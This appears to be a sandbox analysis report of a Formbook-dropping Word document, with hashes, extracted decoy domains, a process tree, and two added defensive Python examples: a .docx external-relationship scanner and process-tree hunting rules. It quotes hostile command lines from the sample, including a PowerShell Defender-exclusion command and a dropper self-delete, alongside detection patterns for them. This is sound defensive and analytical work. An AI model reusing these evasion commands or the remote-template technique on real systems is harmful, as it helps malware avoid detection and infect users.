Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
  • submitted
    15-07-2024 12:37

General

  • Target

    837216bb9f9cda26fbebd58a078b6b16.docx

  • Size

    16KB

  • MD5

    837216bb9f9cda26fbebd58a078b6b16

  • SHA1

    f8f72e714188e1f6afd09f7b7841437a5e8aee80

  • SHA256

    007be9a71495d3adced6a8ff24250aa044384df75b9149b4fdcd9d3b8b609ed7

  • SHA512

    14b72385cf8b462e8425d522368426f10dcab06b5b1be1cb1bf7ca3aad799545cd9f661c38ebafce9d478f1dec36b0324cdfd81695d2a7ec60bbb2aeefbb7624

  • SSDEEP

    384:YyXg0/+HWos8PL8wi4OEwH8TIbE91r2fR4JYHviMvmbWNv:Ycg0SP5P3DOqnYJ22vlvmbWJ

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

oi12

Decoy

exobello.bio

boinga.xyz

animasriversurf.com

gamesflashg.com

hayatbagievleri.online

washington-living.com

july7.store

x-pod-technologies.com

farmhouseflaire.com

qb52aa.top

datasynthing.xyz

5v28n.rest

legacycommerceltd.com

mundodelosjuguetes.com

wjblades.com

z9b6g8.com

eskimotech.net

dreziuy.xyz

bestsolarcompanies.services

vertemisconsulting.com

Signatures

  • Formbook

    Formbook is an information stealer: it grabs credentials and form data from browsers and mail clients, logs keystrokes and clipboard contents, and can take screenshots. It runs from inside a legitimate Windows process and hides its real C2 among a list of decoy domains such as the ones in the extracted config above.

  • Formbook payload 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell (Add-MpPreference) to add Windows Defender exclusions for file extensions, paths or processes. In this run the dropped payload excludes its own path, C:\Users\Admin\AppData\Roaming\obi39199.scr, before re-executing itself.

  • Downloads MZ/PE file
  • Abuses OpenXML format to download file from external location
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor (EQNEDT32.EXE) is a legacy Office component that is activated out of process via COM (hence the "-Embedding" switch and the lack of a WINWORD.EXE parent in the tree below) and is a frequent target of exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
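The "Abuses OpenXML format to download file from external location" signature means the .docx itself carries no payload: a relationship inside the package points at a remote resource that Word fetches on open (here the 592KB orb[1].doc that ends up in the Content.IE5 cache). The check below, added as an example and not part of the sandbox's own logic, unpacks a .docx and reports every relationship with TargetMode="External", rating the ones Word resolves automatically (attachedTemplate, oleObject, image, frame) higher than an ordinary hyperlink. The two sample documents and the http://template.example URL are constructed for the demonstration; the real URL is not shown on this page.

```python
"""Scan a .docx for relationships that make Word pull content from another
host when the document is opened. Added example; not the sandbox's code."""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
DOC_REL_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship types Word resolves without user interaction when rendering.
AUTO_FETCH = {"attachedTemplate", "oleObject", "image", "frame", "subDocument"}


def is_remote(target: str) -> bool:
    """True for http(s)/ftp URLs and UNC shares; False for local file: paths."""
    u = urlparse(target)
    if u.scheme.lower() in ("http", "https", "ftp"):
        return True
    if u.scheme.lower() == "file" and u.netloc not in ("", "localhost"):
        return True  # file://server/share/x is a UNC fetch (and leaks NetNTLM)
    return target.startswith(("\\\\", "//"))


def scan_docx(data: bytes) -> list[dict]:
    """One finding per relationship that points outside the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                # Auto-resolved type + remote target = remote template injection
                # or an equivalent download-on-open; anything else is informational.
                severity = "high" if rtype in AUTO_FETCH and is_remote(target) else "info"
                findings.append({"part": name, "id": rel.get("Id"), "type": rtype,
                                 "target": target, "severity": severity})
    return findings


def is_suspicious(findings: list[dict]) -> bool:
    return any(f["severity"] == "high" for f in findings)


def make_docx(settings_rels_body: str) -> bytes:
    """Constructed minimal .docx; only the rels parts the scanner reads are realistic."""
    W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    parts = {
        "[Content_Types].xml": (
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
            '<Default Extension="xml" ContentType="application/xml"/></Types>'),
        "_rels/.rels": (
            f'<Relationships xmlns="{PKG_REL_NS}"><Relationship Id="rId1" '
            f'Type="{DOC_REL_BASE}officeDocument" Target="word/document.xml"/></Relationships>'),
        "word/document.xml": f'<w:document xmlns:w="{W_NS}"><w:body/></w:document>',
        "word/_rels/document.xml.rels": (
            f'<Relationships xmlns="{PKG_REL_NS}"><Relationship Id="rId1" '
            f'Type="{DOC_REL_BASE}settings" Target="settings.xml"/></Relationships>'),
        "word/settings.xml": (
            f'<w:settings xmlns:w="{W_NS}" xmlns:r="{DOC_REL_BASE[:-1]}">'
            '<w:attachedTemplate r:id="rId1"/></w:settings>'),
        "word/_rels/settings.xml.rels": (
            f'<Relationships xmlns="{PKG_REL_NS}">{settings_rels_body}</Relationships>'),
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, xml in parts.items():
            zf.writestr(name, xml)
    return buf.getvalue()


# Constructed samples. The URL is a placeholder, not the one this sample used.
MALICIOUS = make_docx(
    f'<Relationship Id="rId1" Type="{DOC_REL_BASE}attachedTemplate" '
    'Target="http://template.example/orb.doc" TargetMode="External"/>')
# A locally attached template is how Word itself records Normal.dotm: benign.
BENIGN = make_docx(
    f'<Relationship Id="rId1" Type="{DOC_REL_BASE}attachedTemplate" '
    'Target="file:///C:/Users/Admin/AppData/Roaming/Microsoft/Templates/Normal.dotm" '
    'TargetMode="External"/>')

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(label, is_suspicious(scan_docx(doc)), scan_docx(doc))
```

Run it against a real sample with `scan_docx(open(path, "rb").read())`; the same walk over `*.rels` works for .xlsx and .pptx, since the package relationship schema is shared across OpenXML formats.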

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1244
    • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\837216bb9f9cda26fbebd58a078b6b16.docx"
      2⤵
      • Drops file in Windows directory
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3016
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        3⤵
        PID:1384
    • C:\Windows\SysWOW64\autochk.exe
      "C:\Windows\SysWOW64\autochk.exe"
      2⤵
      PID:1084
    • C:\Windows\SysWOW64\cmstp.exe
      "C:\Windows\SysWOW64\cmstp.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1480
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Roaming\obi39199.scr"
        3⤵
        PID:984
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • Loads dropped DLL
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:3044
    • C:\Users\Admin\AppData\Roaming\obi39199.scr
      "C:\Users\Admin\AppData\Roaming\obi39199.scr"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:2804
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\obi39199.scr"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:448
      • C:\Users\Admin\AppData\Roaming\obi39199.scr
        "C:\Users\Admin\AppData\Roaming\obi39199.scr"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        PID:2312
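The tree above is the whole chain in five steps: Equation Editor writes and runs obi39199.scr, the dropper adds a Defender exclusion for itself, re-launches its own image and hollows the child (SetThreadContext plus WriteProcessMemory), the payload ends up in Explorer.EXE (the 628KB region at memory/1244-153) and from there in cmstp.exe, which finally deletes the dropper with cmd /c del. Each of those steps is visible in process-creation telemetry alone. The rules below are added here as an example of hunting for that shape; they are mine, not the sandbox's signatures. The event list is constructed from the PIDs, images and command lines in this report; the parent of EQNEDT32.EXE is not shown on the page, so its ppid is set to 0 as an assumption.

```python
"""Hunt rules over process-creation records, exercised on a constructed event
list that mirrors this report's process tree. Added example, not sandbox code."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int        # 0 = parent not recorded on the page (assumption)
    image: str
    cmdline: str


USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
EXCLUSION_RE = re.compile(r"add-mppreference\s+-exclusion(path|extension|process)", re.I)
SELF_DELETE_RE = re.compile(r"/c\s+del\b.*\\appdata\\", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def in_user_writable(path: str) -> bool:
    return any(d in path.lower() for d in USER_WRITABLE)


def detect(events: list[Proc]) -> dict[int, list[str]]:
    """Return {pid: [rule, ...]} for every process that matched at least one rule."""
    by_pid = {e.pid: e for e in events}
    hits = defaultdict(list)
    for e in events:
        parent = by_pid.get(e.ppid)
        name = basename(e.image)
        pname = basename(parent.image) if parent else ""
        # 1. Office or Equation Editor starting a binary from a user-writable path.
        if pname in OFFICE and in_user_writable(e.image):
            hits[e.pid].append("office-spawns-user-writable-binary")
        # 2. Defender exclusion added from a PowerShell command line.
        if name == "powershell.exe" and EXCLUSION_RE.search(e.cmdline):
            hits[e.pid].append("defender-exclusion-added")
        # 3. A dropper launching its own image again: the prelude to hollowing
        #    the child (SetThreadContext / WriteProcessMemory in the report).
        if parent and parent.image.lower() == e.image.lower() and in_user_writable(e.image):
            hits[e.pid].append("self-reexecution")
        # 4. cmd /c del of a file under AppData: dropper self-cleanup.
        if name == "cmd.exe" and SELF_DELETE_RE.search(e.cmdline):
            hits[e.pid].append("self-delete-via-cmd")
        # 5. explorer.exe starting a SysWOW64 binary with no arguments: the
        #    shape of Formbook's explorer -> system-process injection hop.
        if (pname == "explorer.exe"
                and e.image.lower().startswith("c:\\windows\\syswow64\\")
                and e.cmdline.strip().strip('"').lower() == e.image.lower()):
            hits[e.pid].append("explorer-spawns-bare-syswow64-binary")
    return dict(hits)


OFFICE14 = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE"
EQNEDT = "C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE"
DROPPER = "C:\\Users\\Admin\\AppData\\Roaming\\obi39199.scr"
PS_IMAGE = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
PS_CMD = ('"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
          'Add-MpPreference -ExclusionPath "' + DROPPER + '"')

# Constructed from the report's process tree (PIDs and command lines as shown).
SAMPLE_EVENTS = [
    Proc(1244, 0, "C:\\Windows\\Explorer.EXE", "C:\\Windows\\Explorer.EXE"),
    Proc(3016, 1244, OFFICE14, f'"{OFFICE14}" /n "C:\\Users\\Admin\\AppData\\Local\\Temp\\837216bb9f9cda26fbebd58a078b6b16.docx"'),
    Proc(1384, 3016, "C:\\Windows\\splwow64.exe", "C:\\Windows\\splwow64.exe 12288"),
    Proc(1084, 1244, "C:\\Windows\\SysWOW64\\autochk.exe", '"C:\\Windows\\SysWOW64\\autochk.exe"'),
    Proc(1480, 1244, "C:\\Windows\\SysWOW64\\cmstp.exe", '"C:\\Windows\\SysWOW64\\cmstp.exe"'),
    Proc(984, 1480, "C:\\Windows\\SysWOW64\\cmd.exe", f'/c del "{DROPPER}"'),
    Proc(3044, 0, EQNEDT, f'"{EQNEDT}" -Embedding'),   # ppid 0: parent not on the page
    Proc(2804, 3044, DROPPER, f'"{DROPPER}"'),
    Proc(448, 2804, PS_IMAGE, PS_CMD),
    Proc(2312, 2804, DROPPER, f'"{DROPPER}"'),
]

if __name__ == "__main__":
    for pid, rules in sorted(detect(SAMPLE_EVENTS).items()):
        print(pid, ", ".join(rules))
```

Rule 5 is the noisiest of the five on a real estate (some LOLBins are legitimately started by Explorer without arguments), so treat it as a correlation hint rather than an alert on its own; rules 1 to 4 are each specific enough to page on, and together they reproduce the chain without any network or memory data.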


        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

          Filesize

          1KB

          MD5

          7fb5fa1534dcf77f2125b2403b30a0ee

          SHA1

          365d96812a69ac0a4611ea4b70a3f306576cc3ea

          SHA256

          33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

          SHA512

          a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

          Filesize

          436B

          MD5

          1bfe0a81db078ea084ff82fe545176fe

          SHA1

          50b116f578bd272922fa8eae94f7b02fd3b88384

          SHA256

          5ba8817f13eee00e75158bad93076ab474a068c6b52686579e0f728fda68499f

          SHA512

          37c582f3f09f8d80529608c09041295d1644bcc9de6fb8c4669b05339b0dd870f9525abc5eed53ad06a94b51441275504bc943c336c5beb63b53460ba836ca8d

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

          Filesize

          174B

          MD5

          34c4241e2d3c7d32eca4cb4dd1d1cf2a

          SHA1

          ea6b55e8a5e9f99e014e4e830b14ab9b19c6a672

          SHA256

          a3f3414ce8b28afc0fa97aa23f588fbd05b0d9660bfd8f899fc6b00f98083407

          SHA512

          9c658e8f8d3323a355988f7d591af7885f87973fa8087494f14737c67cfd398a6e4c1bc42f5eb3b73cc0de3bf1ba7984c179227f78b844b8b734ff6d19f559a3

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

          Filesize

          170B

          MD5

          675e285a7edb106b0c4aa0e0bbad339b

          SHA1

          4f06df75813df8d2e711ccfb413d44369e9b144f

          SHA256

          903e925c2a7c1c8fdecff4a4646418b7f55a313d0e0ef41b443bc47421ac50fc

          SHA512

          403300bd6974ea7916479a2918fe9c6080f36c558191d08894f11875df4415a6dbe3cbad7e26e4d7021eba1a5b7511b18ffe0e558b7f337e0f2024bd1e095b9c

        • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{D24677F9-11D2-4BFA-A366-B79F016AB727}.FSD

          Filesize

          128KB

          MD5

          07a17a1326fcd38fa15f275c55db9e02

          SHA1

          f68009ad08ca5e7f8f11ebf2475ef5d4d12ef7b1

          SHA256

          2c99fcf183315be27493676c19c58ca390bed5100f505cd6bbda66055c0829c2

          SHA512

          de681f4cb268637ac87d62b49b8c4c45f7c309e20d67910b63480947c2bc512f761c6e63c826468861b709efa084d6ddb50aba4bbbb6500c781f048f80bfb0dc

        • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

          Filesize

          128KB

          MD5

          77f2c7c46ec26da3f64337b8d7e10503

          SHA1

          33f371fb767ff9ca8e530ea6f5f9d8bbd90835cb

          SHA256

          16051cd9138bf983475cb58b0aaed58b7ba6d848fe8fe92ed69d096228b2f2dd

          SHA512

          61195ee5c7d6dcb83cdf083ba2f640039057a25ad312dc4000c6f2a795bcca14e69bb734ac63d3cfd8ec2c111b7de7dbf2409af4e5b666c83f5d22ed402b7ac7

        • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{1F02B14F-3D54-4AFF-9D2E-B08A4A2F1E20}.FSD

          Filesize

          128KB

          MD5

          784fc7d54aec20f06176162e2c9c8984

          SHA1

          f8658cde004cb55ef6f8af0586523fc888f1ba06

          SHA256

          8ae1189d9290639bc26350b213de491a86f3f297db3d39c46740dd905d8e9f1a

          SHA512

          2cc05aad0d31ac73d8d28600e78710689cf1bbe0871f2ae3702e797c07b351ada69216ab774bacaba36e5722b854814456e7c14827a2445a4855b25074cc8c7f

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5J67VDZD\orb[1].doc

          Filesize

          592KB

          MD5

          2ba92be429cdd63c858fa913c4330e03

          SHA1

          e636674e6ae85009963aac1769dd9330162f2c1b

          SHA256

          89d4f7ff0f7581285aa90f39213b779edabda6196b48bc386131d71f64b52548

          SHA512

          cf92cba7448c78c2798c5f5a4a13891e0fe8a2929f7819969424e54bba119c9ce2a2c1310b0621ca0528f2dd57837cc2d08848151cfe4193c90a5a92dd4fbea5

        • C:\Users\Admin\AppData\Local\Temp\CabC02.tmp

          Filesize

          70KB

          MD5

          49aebf8cbd62d92ac215b2923fb1b9f5

          SHA1

          1723be06719828dda65ad804298d0431f6aff976

          SHA256

          b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

          SHA512

          bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        • C:\Users\Admin\AppData\Local\Temp\{7A9EF1EB-BD86-4DBC-A007-B61E7E4DB7FA}

          Filesize

          128KB

          MD5

          ce15c2221ebc2de39f051bf35fba1f82

          SHA1

          4c4e4436d365a975aca0d84a6fe49df8e466c1b6

          SHA256

          ccb7de4359d9f1c6f501028f9469029a313826509a007fd4e77ca6ab46d8d079

          SHA512

          669e415e9a3e04ec343c561e0241fb6bffb22357110798023bdae4394ef94fea341bc360ea9fe8a516d9ad1a77ad1d66aa1821a9e53ebc9a4e7ce66f18d302b8

        • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

          Filesize

          253B

          MD5

          2d35132d09d053542e46267beb82214c

          SHA1

          2060db06fd9aba87fc74de4417a311aee66e653d

          SHA256

          110d85ee240580609b90ae8dc261a8d9136e32673b008c3f7946a6beab9ca479

          SHA512

          0f3c3677a96d5afa6d53d31ca06ee63589d5d3de53933fb6a30c11dff64716f4dee6155e4000f30ba7bc9dc5db90a158f88c36c0efa10c845e16e5b4337a6a06

        • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

          Filesize

          2B

          MD5

          f3b25701fe362ec84616a93a45ce9998

          SHA1

          d62636d8caec13f04e28442a0a6fa1afeb024bbb

          SHA256

          b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

          SHA512

          98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

        • \Users\Admin\AppData\Roaming\obi39199.scr

          Filesize

          641KB

          MD5

          5bb28f55f7e40a6fc139ab8855a2f4f1

          SHA1

          30e79283844d61aaf849465d5755d0766daa10b6

          SHA256

          4f0c6fbe81af5502a29f6e8f0126f213498c24531e80512d1966f773d5131365

          SHA512

          72d969877392a06f00f8e8f2f12278ba51ca55938227b2d1efed7bffbd953f1657afa0fcf1fd21d8e50f5ec716cc60c0c4e87a2341f63bee7bde0de0a42dfd94

        • memory/1244-153-0x0000000006520000-0x00000000065BD000-memory.dmp

          Filesize

          628KB

        • memory/1480-148-0x00000000000D0000-0x00000000000FF000-memory.dmp

          Filesize

          188KB

        • memory/1480-147-0x0000000000E30000-0x0000000000E48000-memory.dmp

          Filesize

          96KB

        • memory/2312-137-0x0000000000400000-0x000000000042F000-memory.dmp

          Filesize

          188KB

        • memory/2312-141-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

          Filesize

          4KB

        • memory/2312-142-0x0000000000400000-0x000000000042F000-memory.dmp

          Filesize

          188KB

        • memory/2312-139-0x0000000000400000-0x000000000042F000-memory.dmp

          Filesize

          188KB

        • memory/2804-119-0x0000000000820000-0x00000000008C4000-memory.dmp

          Filesize

          656KB

        • memory/2804-136-0x0000000004B50000-0x0000000004BC6000-memory.dmp

          Filesize

          472KB

        • memory/2804-135-0x0000000000540000-0x000000000054E000-memory.dmp

          Filesize

          56KB

        • memory/2804-124-0x0000000000520000-0x000000000053A000-memory.dmp

          Filesize

          104KB

        • memory/3016-2-0x000000007169D000-0x00000000716A8000-memory.dmp

          Filesize

          44KB

        • memory/3016-0-0x000000002F4E1000-0x000000002F4E2000-memory.dmp

          Filesize

          4KB

        • memory/3016-149-0x000000007169D000-0x00000000716A8000-memory.dmp

          Filesize

          44KB

        • memory/3016-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

          Filesize

          64KB